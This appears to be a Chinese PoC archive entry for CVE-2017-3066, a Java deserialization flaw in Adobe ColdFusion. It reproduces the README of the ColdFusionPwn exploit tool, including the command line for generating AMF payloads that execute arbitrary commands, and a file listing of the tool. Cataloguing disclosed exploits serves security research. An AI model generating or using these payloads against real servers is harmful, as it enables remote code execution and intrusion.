关联漏洞
标题:
Adobe ColdFusion 安全漏洞
(CVE-2017-3066)
描述:Adobe ColdFusion是美国奥多比(Adobe)公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。以下版本受到影响:Adobe ColdFusion (2016 release) Update 3及之前的版本,ColdFusion 11 Update 11及之前的版本,Col
描述
Exploitation Tool for CVE-2017-3066 targeting Adobe Coldfusion 11/12
介绍
# ColdFusionPwn
Exploitation Tool for CVE-2017-3066 targeting Adobe Coldfusion 11/12.
## Description
The tool allows you to generate serialized AMF-payloads to exploit the missing input validation of allowed classes.
For details see our [blog post](https://codewhitesec.blogspot.com/2018/03/exploiting-adobe-coldfusion.html).
## Install
Get the latest version of [ysoserial](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar).
Get ColdFusionPwn from [releases](https://github.com/codewhitesec/ColdFusionPwn/releases).
## Usage
```bash
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]
```
```
- [-s|-e] Setter (CF11) or Externalizable Exploit (CF11/12) technique
- [payload type] ysoserial gadget payload
- [command] command to be executed
- [outfile] output file for the generated payload
```
It's required to have ColdFusionPwn-0.0.1-SNAPSHOT-all.jar as first entry in the classpath, since the ApacheCommons BeanUtils library shipped with ysoserial is newer (and has a different serialversion uid).
## Examples
```bash
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 calc.exe /tmp/out.amf
```
文件快照
[4.0K] /data/pocs/c0ee6e2a7c9c37f330691ac33eb3040923adf9ef
├── [ 740] DISCLAIMER.md
├── [1.0K] LICENSE
├── [2.9K] pom.xml
├── [1.3K] README.md
└── [4.0K] src
├── [4.0K] assembly
│ └── [1.3K] bin.xml
└── [4.0K] main
└── [4.0K] java
├── [4.0K] com
│ └── [4.0K] codewhitesec
│ └── [4.0K] coldfusionpwn
│ └── [2.3K] ColdFusionPwner.java
└── [4.0K] org
├── [4.0K] apache
│ └── [4.0K] axis2
│ └── [4.0K] util
│ └── [1.0K] MetaDataEntry.java
└── [4.0K] jgroups
└── [4.0K] blocks
└── [ 683] ReplicatedTree.java
13 directories, 8 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。